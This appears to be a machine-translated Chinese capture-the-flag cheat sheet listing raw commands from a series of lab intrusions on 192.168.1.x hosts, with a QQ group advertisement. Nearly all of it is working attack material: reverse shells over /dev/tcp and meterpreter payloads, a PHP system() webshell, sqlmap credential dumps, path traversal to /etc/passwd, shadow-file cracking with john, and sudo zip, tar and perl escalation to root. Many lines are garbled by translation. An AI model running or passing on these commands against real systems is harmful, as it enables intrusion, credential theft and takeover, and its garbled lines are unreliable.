This is ctf learning materials, if desired video and range and other learning materials can be added QQ group 1,031,811,955
single-user mode, press the shif e to ro recovery nomodeset, should replace rw single init = / bin / bash press ctr + x passwd root
scan LAN ip, mac mapping relationship
netdiscover -r 192.168.1.1/24
Lift the occupied ports
netstat -pantu
netstat -lnp | grep 4444
fuser -v -n tcp 4444
the kill -9 2169
PS-A
restart Network Service
/etc/init.d/network restart or /etc/init.d/networking restart
service vsftpd start
/home/uftp
nc -nlvp 4444
Information detect
nmap -sV 192.168.1.3
nmap -T4 -p- 192.168.1.6
nmap -T4 -Is -v 192.168.1.6
no -host http://192.168.1.6
themed http://192.168.1.6
python -c “import pty;pty.spawn(’/bin/bash’)”
ssh [email protected]
mysql -h 192.168.1.11 -u username_here -p
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.1.8
set username hadi
set threads 5
set pass_file / root / Desktop /common-password/hadi.txt
set verbose true
python -c “import pty;pty.spawn(’/bin/bash’)”
sqlmap -u “http://192.168.1.8/cat.php?id=4-2” -D “photoblog” --tables
sqlmap -u “http://192.168.1.8/cat.php?id=4-2” -D “photoblog” -T “users” --columns
sqlmap -u “http://192.168.1.8/cat.php?id=4-2” -D “photoblog” -T “users” -C “login,password” --dump
http://192.168.1.9:8080/wordpress/wp-content/themes/twentythirteen/404.php
netdiscover -r 192.168.1.1/24
clear
playsms/index.php?app=main&inc=feature_sendfromfile&op=list
<?php system('uname -a');die(); ?>.phphttps://www.expolit-db.com/exipolits/42003
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 -f elf > /var/www/html/shell
d2dldCBodHRwOi8vMTkyLjE2OC4xLjEwL3MgLU8gL3RtcC9hCg==
sudo perl -e "exec ’ /bin/sh’ "
bash -i
shellcd.PHP
apt-get install avws
sqlmap -u “http://192.168.1.9” --headers=“X-Forwarded-For:*” --dbs --batch
sqlmap -u url --headers=“X-Forwarded-For:*” --dbs --batch
sqlmap -u http://192.168.1.9 --headers=“X-Forwarded-For:*” -D photoblog --tables --batch
sqlmap -u http://192.168.1.9 --headers=“X-Forwarded-For:*” -D photoblog -T users --columns --batch
sqlmap -u http://192.168.1.9 --headers=“X-Forwarded-For:*” -D photoblog -T users -C login,password --dump --batch
cd /usr/share/webshells/php
cp php-reverse-shell.php /root/桌面/
msfvenom -p python / meterpreter / reverse_tcp lhost = 192.168.1.10 lport = 4444 -f raw> / root / Desktop /shell.py
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
service apache2 start
service apache2 status
sysinfo
shell
http://192.168.1.11/wordpress/wp-content/themes/twentyfifteen/404.php
cat / etc / passwd
knew togie
sudo -l
13.CTF Capture the Flag - directory traversal (www-data users to get permission)
http://192.168.1.8/dbadmin/
http://192.168.1.8/dbadmin/test_db.php
OWASP -zap
http://192.168.1.8 /view.php?page=...%2F...%2F...%2F...%2F...%2F...%2F...%2F...%2F...%2F...%2F...%2F...%2F...%2F...%2F... 2Fetc% 2F% ...% 2Fpasswd
cd / usr / report this content share / webshells / PHP
cp PHP-Reverse-shell.php / root / Desktop
mv php-reverse-shell.php shell.php
python -m “SimpleHTTPServer”
nc -nlvp 4444
/usr/databases/shell.php
http://192.168.1.8/view.php?page=…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2Fusr/databases/shell.php
python -c “import pty;pty.spawn(’/bin/bash’)”
14.WEB安全暴力破解
http://192.168.1.12/secret/wp-login.php
gedit /etc/hosts
http://vtcsec/secret/wp-login.php
wpscan --url 192.168.1.12/secret --enumerate u
wpscan --url http://192.168.1.12/secret --enumerate u
msfconsole
use auxiliary/scanner/http/wordpress_login_enum
set rhosts 192.168.1.12
set pass_file /usr/share/wordlists/dirb/common.txt
set username admin
set targeturi /secret/
run
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 -f raw
back
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.10
http://192.168.1.12/secret/wp-content/themes/twentyseventeen/404.php
download /etc/passwd
download /etc/shadow
unshadow passwd shadow > cracked
john cracked
marlinspike
python -c “import pty;pty.spawn(’/bin/bash’)”
su - marlinspike
sudo -l
sudo bash
15. The path traversal (mention the right root privileges) web security provide the right
uname -a
CAT / etc / Issue
CAT / etc / * - Release
CAT / etc / passwd
CAT / etc / Shadow
CAT / etc / crontab
sudo
sudo the -l
cd / Home
CD WordPress
SSH [email protected]
sWfCsfJSPV9H3AmQzw8
Touch exploit
the sudo -u ZIP exploit.zip exploit the root---unzip Comman = -T "-C SH / bin / the bash"
the sudo -u the root the tar CF2 / dev / null exploit - -checkpoint = 1 --checkpoint-action = " / bin / bash"
16.web security command
http://192.168.1.12:8080/
http://192.168.1.12:8080/test.jsp
ls -l /tmp
ls -alh /tmp
ls -alh /home
ls -alh /home/bill
uname -a
ssh bill@localhost sudo -l
ssh bill@localhost sudo ufw disable
nc -lvp 444
ssh bill@localhost sudo bash -i>& /dev/tcp/192.168.1.10/444 0>& 1
cd /usr/share/webshells/jsp
cp jsp-reverse.jsp /root/桌面/
cd /root/桌面/
python -m SimpleHTTPServer
mv jsp-reverse.jsp webshell.jsp
ssh bill@localhost sudo wget “http://192.168.1.10:8000/webshell.jsp” -O /var/lib/tomcat8/webapps/ROOT/webshell.jsp
ssh bill@localhost sudo chmod 777 /var/lib/tomcat8/webapps/ROOT/webshell.jsp
17. The command execution (using integrated testing tool)
-Service Network Start
the ifconfig ens33 192.168.1.11
mounted Sparta
Git clone https://github.com/secforce/sparta.git / opt / Sparta
Git clone https://github.com/elixir -lang / elixir.git
APT-GET-install Python Elixir
APT-GET-utils install the LDAP Client the rwho rsh-x11-Apps finger
cd / opt / sparta
./sparta.py
/usr/share/dirbuster/wordlists/directory-list-1.0.txt
http://192.168.1.11/admin/
http://192.168.1.11/dev
cd /opt/
git clone https://github.com/UltimateHackers/Hash-Buster/
cd Hash-Buster
hash-identifier
python hash.py
nc -nlvp 4444
echo ‘bash -i >& /dev/tcp/192.168.1.10/4445 0>&1’ | bash
sudo su
18.PUT upload vulnerability
curl -v -X OPTIONS http://192.168.1.11/test
Firefox installation RESTClient
cp /usr/share/webshells/php/php-reverse-shell.php shell.php
http://192.168.1.3/login.php
@ btrisk.com
23. Integrated Test (difficult kernel privilege escalation) WEB security Intermediate invasion
wpscan --url http://192.168.1.6/wordpress --enumerate at --enumerate ap --enumerate u
u --enumerate wpscan http://192.168.1.6/wordpress --url
msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.1.6 lport=4444 -f raw
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
http://192.168.1.6/wordpress/
http://192.168.1.6/wordpress/wp-admin/
http://192.168.1.6/wordpress/wp-admin/theme-editor.php?file=404.php&theme=twentyfourteen&scrollto=0&updated=true
http://192.168.1.6/wordpress/wp-content/themes/twentyfourteen/404.php
searchsploit ubuntu 4.4.0
cd /usr/share/exploitdb/exploits/linux/local/
cp 41458.c /root/桌面
gcc 41458.c -o shellroot
upload /root/桌面/shellroot
chmod 777 shellroot
./shellroot